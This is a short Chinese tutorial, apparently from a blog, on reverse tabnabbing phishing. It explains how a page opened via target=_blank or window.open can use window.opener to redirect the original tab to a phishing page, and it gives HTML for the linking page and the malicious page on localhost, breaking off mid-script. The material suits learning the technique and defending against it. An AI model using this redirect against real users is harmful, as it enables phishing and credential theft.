Reverse Tabnabbing钓鱼
希望你以后能过得好,别辜负我一生不打扰
文章目录
原理:
使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。
两个可以利用点:
1、使用a标签,并且target=_blank,没有使用rel="noopener/noreferrer"属性
2、使用window.open
利用:
创建三个页面A\B\C
A
<html>
<title>正常网站</title>
<body>
<li><a href="http://localhost/b.html" target="_blank" >a标签</a></li>
<button onclick="window.open('http://localhost/b.html')">window.open</button>
</body>
</html>
B
<html>
<title>恶意网站</title>
<body>
<script>
if (window.opener) {
window.opener.location = "http://localhost/c.html